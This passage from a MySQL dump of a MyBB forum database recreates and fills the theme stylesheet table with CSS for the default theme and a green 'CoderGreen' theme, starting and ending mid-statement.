'a:8:{s:6:\"global\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/global.css\";}}s:10:\"usercp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/usercp.css\";}}s:11:\"usercp2.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/usercp.css\";}}s:11:\"private.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/usercp.css\";}}s:9:\"modcp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:21:\"css.php?stylesheet=32\";}}s:16:\"forumdisplay.php\";a:1:{s:6:\"global\";a:1:{i:0;s:21:\"css.php?stylesheet=33\";}}s:14:\"showthread.php\";a:1:{s:6:\"global\";a:2:{i:0;s:21:\"css.php?stylesheet=33\";i:1;s:21:\"css.php?stylesheet=34\";}}s:9:\"index.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/tabbed.css\";}}}', '4,9,6,3'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_themestylesheets`; CREATE TABLE `mybb_themestylesheets` ( `sid` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(30) NOT NULL DEFAULT '', `tid` int(10) unsigned NOT NULL DEFAULT '0', `attachedto` text NOT NULL, `stylesheet` text NOT NULL, `cachefile` varchar(100) NOT NULL DEFAULT '', `lastmodified` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`sid`) ) ENGINE=MyISAM AUTO_INCREMENT=42 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_themestylesheets` WRITE; INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('1', 'global.css', '1', '', 'body { background: #efefef; color: #000; font-family: Verdana, Arial, Sans-Serif; font-size: 13px; text-align: center; /* IE 5 fix */ line-height: 1.4; } a:link { color: #026CB1; text-decoration: none; } a:visited { color: #026CB1; text-decoration: none; } a:hover, a:active { color: #000; text-decoration: underline; } #container { width: 95%; background: #fff; border: 1px solid #e4e4e4; color: #000000; margin: auto auto; padding: 20px; text-align: left; /* IE 5 fix */ } #content { /* FIX: Make internet explorer wrap correctly */ width: auto !important; } .menu ul { color: #000000; font-weight: bold; text-align: right; padding: 4px; } .menu ul a:link { color: #000000; text-decoration: none; } .menu ul a:visited { color: #000000; text-decoration: none; } .menu ul a:hover, .menu ul a:active { color: #4874a3; text-decoration: none; } #panel { background: #efefef; color: #000000; font-size: 11px; border: 1px solid #D4D4D4; padding: 8px; } #panel .remember_me input { vertical-align: middle; margin-top: -1px; } table { color: #000000; font-family: Verdana, Arial, Sans-Serif; font-size: 13px; } .tborder { background: #81A2C4; width: 100%; margin: auto auto; border: 1px solid #0F5C8E; } .thead { background: #026CB1 url(images/thead_bg.gif) top left repeat-x; color: #ffffff; } .thead a:link { color: #ffffff; text-decoration: none; } .thead a:visited { color: #ffffff; text-decoration: none; } .thead a:hover, .thead a:active { color: #ffffff; text-decoration: underline; } .tcat { background: #ADCBE7; color: #000000; font-size: 12px; } .tcat a:link { color: #000000; } .tcat a:visited { color: #000000; } .tcat a:hover, .tcat a:active { color: #000000; } .trow1 { background: #f5f5f5; } .trow2 { background: #EFEFEF; } .trow_shaded { background: #ffdde0; } .trow_selected td { background: #FFFBD9; } .trow_sep { background: #e5e5e5; color: #000; font-size: 12px; font-weight: bold; } .tfoot { background: #026CB1 url(images/thead_bg.gif) top left repeat-x; color: #ffffff; } .tfoot a:link { color: #ffffff; text-decoration: none; } .tfoot a:visited { color: #ffffff; text-decoration: none; } .tfoot a:hover, .tfoot a:active { color: #ffffff; text-decoration: underline; } .bottommenu { background: #efefef; color: #000000; border: 1px solid #4874a3; padding: 10px; } .navigation { color: #000000; font-size: 13px; font-weight: bold; } .navigation a:link { text-decoration: none; } .navigation a:visited { text-decoration: none; } .navigation a:hover, .navigation a:active { text-decoration: none; } .navigation .active { color: #000000; font-size: 13px; font-weight: bold; } .smalltext { font-size: 11px; } .largetext { font-size: 16px; font-weight: bold; } input.textbox { background: #ffffff; color: #000000; border: 1px solid #0f5c8e; padding: 1px; } textarea { background: #ffffff; color: #000000; border: 1px solid #0f5c8e; padding: 2px; font-family: Verdana, Arial, Sans-Serif; line-height: 1.4; font-size: 13px; } select { background: #ffffff; border: 1px solid #0f5c8e; } .editor { background: #f1f1f1; border: 1px solid #ccc; } .editor_control_bar { background: #fff; border: 1px solid #0f5c8e; } .autocomplete { background: #fff; border: 1px solid #000; color: black; } .autocomplete_selected { background: #adcee7; color: #000; } .popup_menu { background: #ccc; border: 1px solid #000; } .popup_menu .popup_item { background: #fff; color: #000; } .popup_menu .popup_item:hover { background: #C7DBEE; color: #000; } .trow_reputation_positive { background: #ccffcc; } .trow_reputation_negative { background: #ffcccc; } .reputation_positive { color: green; } .reputation_neutral { color: #444; } .reputation_negative { color: red; } .invalid_field { border: 1px solid #f30; color: #f30; } .valid_field { border: 1px solid #0c0; } .validation_error { background: url(images/invalid.gif) no-repeat center left; color: #f30; margin: 5px 0; padding: 5px; font-weight: bold; font-size: 11px; padding-left: 22px; } .validation_success { background: url(images/valid.gif) no-repeat center left; color: #00b200; margin: 5px 0; padding: 5px; font-weight: bold; font-size: 11px; padding-left: 22px; } .validation_loading { background: url(images/spinner.gif) no-repeat center left; color: #555; margin: 5px 0; padding: 5px; font-weight: bold; font-size: 11px; padding-left: 22px; } /* Additional CSS (Master) */ img { border: none; } .clear { clear: both; } .hidden { display: none; float: none; width: 1%; } .hiddenrow { display: none; } .selectall { background-color: #FFFBD9; font-weight: bold; text-align: center; } .float_left { float: left; } .float_right { float: right; } .menu ul { list-style: none; margin: 0; } .menu li { display: inline; padding-left: 5px; } .menu img { padding-right: 5px; vertical-align: top; } #panel .links { margin: 0; float: right; } .expcolimage { float: right; width: auto; vertical-align: middle; margin-top: 3px; } img.attachment { border: 1px solid #E9E5D7; padding: 2px; } hr { background-color: #000000; color: #000000; height: 1px; border: 0px; } #copyright { font: 11px Verdana, Arial, Sans-Serif; margin: 0; padding: 10px 0 0 0; } #debug { float: right; text-align: right; margin-top: 0; } blockquote { border: 1px solid #ccc; margin: 0; background: #fff; padding: 4px; } blockquote cite { font-weight: bold; border-bottom: 1px solid #ccc; font-style: normal; display: block; margin: 4px 0; } blockquote cite span { float: right; font-weight: normal; } blockquote cite span.highlight { float: none; font-weight: bold; padding-bottom: 0; } .codeblock { background: #fff; border: 1px solid #ccc; padding: 4px; } .codeblock .title { border-bottom: 1px solid #ccc; font-weight: bold; margin: 4px 0; } .codeblock code { overflow: auto; height: auto; max-height: 200px; display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; } .subforumicon { border: 0; vertical-align: middle; } .separator { margin: 5px; padding: 0; height: 0px; font-size: 1px; list-style-type: none; } form { margin: 0; padding: 0; } .popup_menu .popup_item_container { margin: 1px; text-align: left; } .popup_menu .popup_item { display: block; padding: 3px; text-decoration: none; white-space: nowrap; } .popup_menu a.popup_item:hover { text-decoration: none; } .autocomplete { text-align: left; } .subject_new { font-weight: bold; } .highlight { background: #FFFFCC; padding-top: 3px; padding-bottom: 3px; } .pm_alert { background: #FFF6BF; border: 1px solid #FFD324; text-align: center; padding: 5px 20px; margin-bottom: 15px; font-size: 11px; } .red_alert { background: #FBE3E4; border: 1px solid #A5161A; color: #A5161A; text-align: center; padding: 5px 20px; margin-bottom: 15px; font-size: 11px; } .high_warning { color: #CC0000; } .moderate_warning { color: #F3611B; } .low_warning { color: #AE5700; } div.error { padding: 5px 10px; border-top: 2px solid #FFD324; border-bottom: 2px solid #FFD324; background: #FFF6BF; font-size: 12px; } div.error p { margin: 0; color: #000; font-weight: normal; } div.error p em { font-style: normal; font-weight: bold; padding-left: 24px; display: block; color: #C00; background: url(\'images/error.gif\') no-repeat 0; } div.error ul { margin-left: 24px; } .online { color: #15A018; } .offline { color: #C7C7C7; } .pagination { font-size: 11px; padding-top: 10px; margin-bottom: 5px; } .tfoot .pagination, .tcat .pagination { padding-top: 0; } .pagination .pages { font-weight: bold; } .pagination .pagination_current, .pagination a { padding: 2px 6px; margin-bottom: 3px; } .pagination a { border: 1px solid #81A2C4; } .pagination .pagination_current { background: #F5F5F5; border: 1px solid #81A2C4; font-weight: bold; color: #000; } .pagination a:hover { background: #F5F5F5; text-decoration: none; } .thread_legend, .thread_legend dd { margin: 0; padding: 0; } .thread_legend dd { padding-bottom: 4px; margin-right: 15px; } .thread_legend img { margin-right: 4px; vertical-align: bottom; } .forum_legend, .forum_legend dt, .forum_legend dd { margin: 0; padding: 0; } .forum_legend dd { float: left; margin-right: 10px; } .forum_legend dt { margin-right: 10px; float: left; } .success_message { color: #00b200; font-weight: bold; font-size: 10px; margin-bottom: 10px; } .error_message { color: #C00; font-weight: bold; font-size: 10px; margin-bottom: 10px; } .post_body { padding: 5px; } .post_content { padding: 5px 10px; } .quick_jump { background: url(\'images/jump.gif\') no-repeat 0; width: 13px; height: 13px; padding-left: 13px; /* amount of padding needed for image to fully show */ vertical-align: middle; border: none; } .repbox { font-size:16px; font-weight: bold; padding:5px 7px 5px 7px; } ._neutral { background-color:#FAFAFA; color: #999999; border:1px solid #CCCCCC; } ._minus { background-color: #FDD2D1; color: #CB0200; border:1px solid #980201; } ._plus { background-color:#E8FCDC; color: #008800; border:1px solid #008800; } .pagination_breadcrumb { background-color: #f5f5f5; border: 1px solid #fff; outline: 1px solid #ccc; padding: 5px; margin-top: 5px; font-weight: normal; white-space: nowrap; } .pagination_breadcrumb_link { vertical-align: middle; cursor: pointer; } ', 'global.css', '1339729416'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('2', 'usercp.css', '1', 'usercp.php|usercp2.php|private.php', '.usercp_nav_item { display: block; padding: 1px 0 1px 23px; } .usercp_nav_composepm { background: url(images/usercp/composepm.gif) no-repeat left center; } .usercp_nav_pmfolder { background: url(images/usercp/pmfolder.gif) no-repeat left center; } .usercp_nav_sub_pmfolder { padding-left: 40px; background: url(images/usercp/sub_pmfolder.gif) no-repeat left center; } .usercp_nav_trash_pmfolder { padding-left: 40px; background: url(images/usercp/trash_pmfolder.gif) no-repeat left center; } .usercp_nav_pmtracking { background: url(images/usercp/pmtracking.gif) no-repeat left center; } .usercp_nav_pmfolders { background: url(images/usercp/editfolders.gif) no-repeat left center; } .usercp_nav_profile { background: url(images/usercp/profile.gif) no-repeat left center; } .usercp_nav_email { padding-left: 40px; background: url(images/usercp/email.gif) no-repeat left center; } .usercp_nav_password { padding-left: 40px; background: url(images/usercp/password.gif) no-repeat left center; } .usercp_nav_username { padding-left: 40px; background: url(images/usercp/username.gif) no-repeat left center; } .usercp_nav_editsig { padding-left: 40px; background: url(images/usercp/editsig.gif) no-repeat left center; } .usercp_nav_avatar { padding-left: 40px; background: url(images/usercp/avatar.gif) no-repeat left center; } .usercp_nav_options { background: url(images/usercp/options.gif) no-repeat left center; } .usercp_nav_usergroups { background: url(images/usercp/usergroups.gif) no-repeat left center; } .usercp_nav_editlists { background: url(images/usercp/editlists.gif) no-repeat left center; } .usercp_nav_attachments { background: url(images/usercp/attachments.gif) no-repeat left center; } .usercp_nav_drafts { background: url(images/usercp/drafts.gif) no-repeat left center; } .usercp_nav_subscriptions { background: url(images/usercp/subscriptions.gif) no-repeat left center; } .usercp_nav_fsubscriptions { background: url(images/usercp/fsubscriptions.gif) no-repeat left center; } .usercp_nav_notepad { background: url(images/usercp/notepad.gif) no-repeat left center; } .usercp_nav_viewprofile { background: url(images/usercp/viewprofile.gif) no-repeat left center; } .usercp_nav_home { background: url(images/usercp/home.gif) no-repeat left center; } .usercp_notepad { width: 99%; } .usercp_container { margin: 5px; padding: 8px; border:1px solid #CCCCCC; }', 'usercp.css', '1340045122'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('3', 'modcp.css', '1', 'modcp.php', '.modcp_nav_item { display: block; padding: 1px 0 1px 23px; } .modcp_nav_home { background: url(images/modcp/home.gif) no-repeat left center; } .modcp_nav_announcements { background: url(images/modcp/announcements.gif) no-repeat left center; } .modcp_nav_reports { background: url(images/modcp/reports.gif) no-repeat left center; } .modcp_nav_modqueue { background: url(images/modcp/modqueue.gif) no-repeat left center; } .modcp_nav_modlogs { background: url(images/modcp/modlogs.gif) no-repeat left center; } .modcp_nav_editprofile { background: url(images/modcp/editprofile.gif) no-repeat left center; } .modcp_nav_banning { background: url(images/modcp/banning.gif) no-repeat left center; } .modcp_nav_warninglogs { background: url(images/modcp/warninglogs.gif) no-repeat left center; } .modcp_nav_ipsearch { background: url(images/modcp/ipsearch.gif) no-repeat left center; } .modqueue_message { overflow: auto; max-height: 250px; } .modqueue_controls { width: 270px; float: right; text-align: center; border: 1px solid #ccc; background: #fff; padding: 6px; font-weight: bold; } .modqueue_controls label { margin-right: 8px; } .label_radio_ignore, .label_radio_delete, .label_radio_approve { font-weight: bold; } .modqueue_meta { color: #444; font-size: 95%; margin-bottom: 8px; } .modqueue_mass { list-style: none; margin: 0; width: 150px; padding: 0; } .modqueue_mass li { margin-bottom: 4px; padding: 0; } .modqueue_mass li a { display: block; padding: 4px; border: 1px solid transparent; } .modqueue_mass li a:hover { background: #efefef; border: 1px solid #ccc; text-decoration: none; }', 'modcp.css', '1340045122'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('4', 'star_ratings.css', '1', 'forumdisplay.php|showthread.php', '.star_rating, .star_rating li a:hover, .star_rating .current_rating { background: url(images/star_rating.gif) left -1000px repeat-x; vertical-align: middle; } .star_rating { position: relative; width:80px; height:16px; overflow: hidden; list-style: none; margin: 0; padding: 0; background-position: left top; } td .star_rating { margin: auto; } .star_rating li { display: inline; } .star_rating li a, .star_rating .current_rating { position: absolute; text-indent: -1000px; height: 16px; line-height: 16px; outline: none; overflow: hidden; border: none; top:0; left:0; } .star_rating_notrated li a:hover { background-position: left bottom; } .star_rating li a.one_star { width:20%; z-index:6; } .star_rating li a.two_stars { width:40%; z-index:5; } .star_rating li a.three_stars { width:60%; z-index:4; } .star_rating li a.four_stars { width:80%; z-index:3; } .star_rating li a.five_stars { width:100%; z-index:2; } .star_rating .current_rating { z-index:1; background-position: left center; } .star_rating_success, .success_message { color: #00b200; font-weight: bold; font-size: 10px; margin-bottom: 10px; } .inline_rating { float: left; vertical-align: middle; padding-right: 5px; }', 'star_ratings.css', '1340076878'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('5', 'showthread.css', '1', 'showthread.php', 'ul.thread_tools, ul.thread_tools li { list-style: none; padding: 0; margin: 0; } ul.thread_tools li { padding-left: 26px; padding-bottom: 4px; margin-bottom: 3px; font-size: 11px; } ul.thread_tools li.printable { background: url(images/printable.gif) no-repeat 0px 0px; } ul.thread_tools li.sendthread { background: url(images/send.gif) no-repeat 0px 0px; } ul.thread_tools li.subscription_add { background: url(images/subscribe.gif) no-repeat 0px 0px; } ul.thread_tools li.subscription_remove { background: url(images/unsubscribe.gif) no-repeat 0px 0px; }', 'showthread.css', '1340045122'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('25', 'tabbed.css', '1', 'index.php', '.shadetabs{ padding: 3px 0; margin-left: 0; margin-top: 1px; margin-bottom: 0; font: bold 12px Verdana; list-style-type: none; text-align: left; /*set to left, center, or right to align the menu as desired*/ } .shadetabs li{ display: inline; margin: 0; } .shadetabs li a{ text-decoration: none; position: relative; z-index: 1; padding: 3px 7px; margin-right: 3px; border: 1px solid #778; color: #ffffff; background: white url(images/thead_bg.gif) top left repeat-x; } .shadetabs li a:hover{ text-decoration: underline; } .shadetabs li a.selected{ /*selected main tab style */ position: relative; top: 1px; } .shadetabs li a.selected{ /*selected main tab style */ background:#ADCBE7; color: #000000; border-bottom-color: #81A2C4; } .shadetabs li a.selected:hover{ /*selected main tab style */ text-decoration: none; } .tabcontent{ display:none; } @media print { .tabcontent { display:block !important; } } ', 'tabbed.css', '1340045122'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('30', 'global.css', '10', '', 'body { background: #1e1e1e url(images/CoderGreen/bg1.png) repeat; color: #000; text-align: center; line-height: 1.4; margin: 0; background-attachment: fixed; font-family: Verdana, Arial, Sans-Serif; font-size: 13px; } a:link { color: #539e01; text-decoration: none; } a:visited { color: #539e01; text-decoration: none; } a:hover, a:active { color: #539e01; text-decoration: underline; } #container { background: #212121; width: 91%; color: #707070; border: 3px solid #00AB09; margin: auto auto; padding: 0 15px 15px; text-align: left; text-shadow: 1px 1px #000; } #header { background: #222222 url(images/CoderGreen/header.png) bottom repeat-x; border: 1px solid #353434; padding: 0 8px 0; -moz-border-radius-bottomleft: 5px; -webkit-border-bottom-left-radius: 5px; border-bottom-left-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px; border-bottom-right-radius: 5px; overflow: hidden; -moz-box-shadow: 0px 0px 1px #000; -webkit-box-shadow: 0px 0px 1px #000; box-shadow: 0px 0px 1px #000; } #content { /* FIX: Make internet explorer wrap correctly */ width: auto !important; } .menu ul { color: #000000; font-weight: bold; text-align: right; padding: 4px; } .menu ul a:link { color: #000000; text-decoration: none; } .menu ul a:visited { color: #000000; text-decoration: none; } .menu ul a:hover, .menu ul a:active { color: #222; text-decoration: none; } #panel { background: #549f01 url(images/CoderGreen/panel.png); color: #cccccc; border: 1px solid #6D6D6D; padding: 6px; font-size: 11px; } table { color: #fff; text-shadow:1px 1px #000; font-family: Verdana, Arial, Sans-Serif; font-size: 13px; } .tborder { width: 100%; margin: auto auto; border: 1px solid #373737; border-width: 0px 1px 1px; -webkit-box-shadow: 0px 0px 5px #bbb; -moz-box-shadow: 0px 0px 5px #bbb; -ms-box-shadow: 0px 0px 5px #bbb; -o-box-shadow: 0px 0px 5px #bbb; box-shadow: 0px 0px 5px #bbb; } .tborder1 { width: 100%; margin: auto auto; border: 1px solid #373737; border-width: 0px 1px 1px; } .thead { background: #437c01 url(images/CoderGreen/thead.png) repeat-x;; color: #000; border: 1px solid #181818; border-width:1px 0 1px 0; text-shadow: 0 -1px #74ad34; padding: 4px; -moz-border-radius-topleft: 5px; -webkit-border-top-left-radius: 5px; border-top-left-radius: 5px; -moz-border-radius-topright: 5px; -webkit-border-top-right-radius: 5px; border-top-right-radius: 5px; position: relative; line-height: 23px; } .thead a:link { color: #000; text-decoration: none; } .thead a:visited { color: #000; text-decoration: none; } .thead a:hover, .thead a:active { color: #000; text-decoration: underline; } .tcat { background: #2b2b2b url(images/CoderGreen/tcat.png) repeat-x; color: #707070; border: 1px solid #171717; border-right-color: #373737; border-top-color: #373737; text-shadow: 0 -1px #000; font-size: 12px; } .tcat a:link { color: #707070; } .tcat a:visited { color: #707070; } .tcat a:hover, .tcat a:active { color: #fff; } .tcat:last-child, .trow1:last-child, .trow2:last-child { border-right-color:#171717; } .trow1 { background: #212121 url(images/CoderGreen/trow.png) repeat-x; border: 1px solid #171717; border-right-color: #373737; border-top-color: #373737; } .trow2 { background: #212121 url(images/CoderGreen/trow.png) repeat-x; border: 1px solid #171717; border-right-color: #373737; border-top-color: #373737; } .trow_shaded { background: #ffdde0; } .trow_selected td { background: #FFFBD9; } .trow_sep { background: #212121; color: #fff; border: 1px solid #171717; border-top-color: #373737; font-size: 12px; font-weight: bold; } .tfoot { background: #56a301 url(images/CoderGreen/tfoot.png) repeat-x; color: #000; border: 1px solid #181818; border-top: none; text-shadow: 0 -1px #74ad34; } .tfoot a:link { color: #000; text-decoration: none; } .tfoot a:visited { color: #000; text-decoration: none; } .tfoot a:hover, .tfoot a:active { color: #000; text-decoration: underline; } .bottommenu { background: #212121 url(images/CoderGreen/header.png) repeat-x; color: #707070; border: 1px solid #111; border-top-color: #373737; padding: 8px; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; text-shadow:0 -1px #000; font-size: 11px; } .navigation { background: #212121 url(images/CoderGreen/trow.png) repeat-x; color: #707070; text-shadow: 1px 1px #000; border: 1px solid #373737; padding: 4px; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; -moz-box-shadow: 0px 0px 1px #000; -webkit-box-shadow: 0px 0px 1px #000; box-shadow: 0px 0px 1px #000; font-size: 13px; font-weight: bold; } .navigation a:link { color: #707070; text-decoration: none; } .navigation a:visited { color: #707070; text-decoration: none; } .navigation a:hover, .navigation a:active { color: #707070; text-decoration: none; } .navigation .active { color: #4a8805; font-size: small; font-weight: bold; } .smalltext { font-size: 11px; } .largetext { font-size: 16px; font-weight: bold; } .editor { background: #f1f1f1; border: 1px solid #ccc; } .editor_control_bar { background: #fff; border: 1px solid #0f5c8e; } .autocomplete { background: #fff; border: 1px solid #000; color: black; } .autocomplete_selected { background: #adcee7; color: #000; } .popup_menu { background: #ccc; border: 1px solid #000; } .popup_menu .popup_item { background: #fff; color: #000; } .popup_menu .popup_item:hover { background: #C7DBEE; color: #000; } .trow_reputation_positive { background: #43FF43; } .trow_reputation_negative { background: #FF5F5F; } .reputation_positive { color: green; } .reputation_neutral { color: #444; } .reputation_negative { color: red; } .invalid_field { border: 1px solid #f30; color: #f30; } .valid_field { border: 1px solid #0c0; } .validation_error { background: url(images/invalid.gif) no-repeat center left; color: #f30; margin: 5px 0; padding: 5px; font-weight: bold; font-size: 11px; padding-left: 22px; } .validation_success { background: url(images/valid.gif) no-repeat center left; color: #00b200; margin: 5px 0; padding: 5px; font-weight: bold; font-size: 11px; padding-left: 22px; } .validation_loading { background: url(images/spinner.gif) no-repeat center left; color: #555; margin: 5px 0; padding: 5px; font-weight: bold; font-size: 11px; padding-left: 22px; } /* Additional CSS (Master) */ img { border: none; } .clear { clear: both; } .hidden { display: none; float: none; width: 1%; } .hiddenrow { display: none; } .selectall { background-color: #FFFBD9; font-weight: bold; text-align: center; } .float_left { float: left; } .float_right { float: right; } .menu ul { list-style: none; margin: 0; } .menu li { background: #437c01 url(images/CoderGreen/thead.png) repeat-x; border: 1px solid #181818; text-shadow: 0 -1px #74ad34; padding: 8px; -moz-border-radius-bottomleft: 5px; -webkit-border-bottom-left-radius: 5px; border-bottom-left-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px; border-bottom-right-radius: 5px; display: inline; } .menu img { padding-right: 5px; vertical-align: top; } #panel .links { color: #ffffff; margin: 0; float: right; } .expcolimage { width: auto; float: right; } img.attachment { border: 1px solid #E9E5D7; padding: 2px; } hr { background-color: #000000; color: #000000; height: 1px; border: 0px; } #copyright { font: 11px Verdana, Arial, Sans-Serif; margin: 0; padding: 10px 0 0 0; } #debug { float: right; text-align: right; margin-top: 0; } blockquote { border: 1px solid #fff; margin: 0; color: #000; background: #A4A4A4; padding: 4px; } blockquote cite { font-weight: underline; border-bottom: 1px solid #ccc; font-style: normal; display: block; margin: 4px 0; } blockquote cite span { float: right; font-weight: normal; } blockquote cite span.highlight { float: none; font-weight: bold; padding-bottom: 0; } .codeblock { background: #A4A4A4; color: #000; border: 1px solid #ccc; padding: 4px; } .codeblock .title { border-bottom: 1px solid #ccc; font-weight: bold; margin: 4px 0; } .codeblock code { overflow: auto; height: auto; max-height: 200px; display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; } .subforumicon { border: 0; vertical-align: middle; } .separator { margin: 5px; padding: 0; height: 0px; font-size: 1px; list-style-type: none; } form { margin: 0; padding: 0; } .popup_menu .popup_item_container { margin: 1px; text-align: left; } .popup_menu .popup_item { display: block; padding: 3px; text-decoration: none; white-space: nowrap; } .popup_menu a.popup_item:hover { text-decoration: none; } .autocomplete { text-align: left; } .subject_new { font-weight: bold; } .highlight { background: #FFFFCC; padding-top: 3px; padding-bottom: 3px; } .pm_alert div { background: #212121 url(images/CoderGreen/trow.png) repeat-x; color: #707070; border: 1px solid #373737; text-align: center; padding: 5px 20px; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; font-size: 11px; } .pm_alert .float_right { background: none; border: none; } .pm_alert { border: 1px solid #171717; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; margin: 0; padding: 0; } .red_alert { background: #FBE3E4; border: 1px solid #A5161A; color: #A5161A; text-align: center; padding: 5px 20px; margin-bottom: 15px; font-size: 11px; } .high_warning { color: #CC0000; } .moderate_warning { color: #F3611B; } .low_warning { color: #AE5700; } div.error { padding: 5px 10px; border-top: 2px solid #FFD324; border-bottom: 2px solid #FFD324; background: #FFF6BF; font-size: 12px; } div.error p { margin: 0; color: #000; font-weight: normal; } div.error p em { font-style: normal; font-weight: bold; padding-left: 24px; display: block; color: #C00; background: url(images/error.gif) no-repeat 0; } div.error.ul { margin-left: 24px; } .online { color: #15A018; } .offline { color: #C7C7C7; } .pagination { font-size: 11px; padding-top: 10px; margin-bottom: 5px; } .tfoot .pagination, .tcat .pagination { padding-top: 0; } .pagination .pages { font-weight: bold; } .pagination .pagination_current, .pagination a { padding: 2px 6px; margin-bottom: 3px; } .pagination a { border: 1px solid #000000; } .pagination .pagination_current { background: #00B503; color: #ffffff; border: 1px solid #000000; font-weight: bold; } .pagination a:hover { background: #02B717; color: #ffffff; text-decoration: none; } .thread_legend, .thread_legend dd { margin: 0; padding: 0; } .thread_legend dd { padding-bottom: 4px; margin-right: 15px; } .thread_legend img { margin-right: 4px; vertical-align: bottom; } .forum_legend, .forum_legend dt, .forum_legend dd { margin: 0; padding: 0; line-height: 45px; } .forum_legend dd { float: left; margin-right: 10px; } .forum_legend dt { margin-right: 10px; float: left; } .success_message { color: #00b200; font-weight: bold; font-size: 10px; margin-bottom: 10px; } .error_message { color: #C00; font-weight: bold; font-size: 10px; margin-bottom: 10px; } .post_body { padding: 5px; } .post_content { padding: 5px 10px; } .quick_jump { background: url(images/jump.gif) no-repeat 0; width: 13px; height: 13px; padding-left: 13px; /* amount of padding needed for image to fully show */ vertical-align: middle; border: none; } .repbox { font-size:16px; font-weight: bold; padding:5px 7px 5px 7px; } ._neutral { background-color:#FAFAFA; color: #999999; border:1px solid #CCCCCC; } ._minus { background-color: #FDD2D1; color: #CB0200; border:1px solid #980201; } ._plus { background-color:#E8FCDC; color: #008800; border:1px solid #008800; } .pagination_breadcrumb { background-color: #109A13; border: 1px solid #fff; outline: 1px solid #ccc; padding: 5px; margin-top: 5px; font-weight: normal; } .pagination_breadcrumb_link { vertical-align: middle; cursor: pointer; } .logo { text-align: center; } input[type=submit], input[type=button] { background: #437c01 url(images/CoderGreen/thead.png) repeat-x; color: #000; border: none; text-shadow: 0 -1px #74ad34; padding: 4px; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; position: relative; cursor: pointer; font-weight: bold; } .tfoot input[type=submit], .tfoot input[type=button] { border: 1px solid #181818; } textarea { background: #2b2b2b url(images/CoderGreen/tcat.png) repeat-x; color: #FFFFFF; border: 1px solid #373737; text-shadow: 0 -1px #000; padding: 4px; margin: 1px; outline: 1px solid #171717; font-size: 13px; } table select, table input.textbox, #header input.textbox, .bottommenu select { outline: 1px solid #171717; } select, input.textbox { background: #2b2b2b url(images/CoderGreen/tcat.png) repeat-x; color: #707070; border: 1px solid #373737; text-shadow: 0 -1px #000; padding: 4px; margin: 1px; outline: 1px solid #000; } #lang_select { position: relative; top: -7px; } .logo { text-align:center; } .postbit { -moz-box-shadow:inset 0px 0px 0px -2px #000000; -webkit-box-shadow:inset 0px 0px 0px -2px #000000; box-shadow:inset 0px 0px 0px -2px #000000; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #363536), color-stop(1, #080808) ); background:-moz-linear-gradient( center top, #363536 5%, #080808 100% ); filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=\'#363536\', endColorstr=\'#080808\'); background-color:#363536; -moz-border-radius:42px; -webkit-border-radius:42px; border-radius:42px; border:1px solid #000000; display:inline-block; color:#1ee300; font-family:arial; font-size:13px; font-weight:bold; padding:2px 14px; text-decoration:none; text-shadow:0px 1px 0px #00c200; } .postbit:hover { background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #080808), color-stop(1, #363536) ); background:-moz-linear-gradient( center top, #080808 5%, #363536 100% ); filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=\'#080808\', endColorstr=\'#363536\'); background-color:#080808; } .postbit:active { position:relative; top:1px; } /* ADMIN / MOD NOTICE */ .mod_bb { background:#000000; color:#FF0000; padding:.8em; margin-bottom:1.6em; border:2px solid #B40404; } .mod_bb img { position:relative; top:2px; } .post_body a:link { color: #2E64FE; text-decoration: none; } .post_body a:visited { color: #A4A4A4; text-decoration: none; } .post_body a:hover, .post_body a:active { color: #0040FF; text-decoration: underline; } ', 'global.css', '1351041610'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('31', 'usercp.css', '10', 'usercp.php|usercp2.php|private.php', '.usercp_nav_item { display: block; padding: 1px 0 1px 23px; } .usercp_nav_composepm { background: url(images/CoderGreen/usercp/composepm.gif) no-repeat left center; } .usercp_nav_pmfolder { background: url(images/CoderGreen/usercp/pmfolder.gif) no-repeat left center; } .usercp_nav_sub_pmfolder { background: url(images/CoderGreen/usercp/sub_pmfolder.gif) no-repeat left center; padding-left: 40px; } .usercp_nav_trash_pmfolder { background: 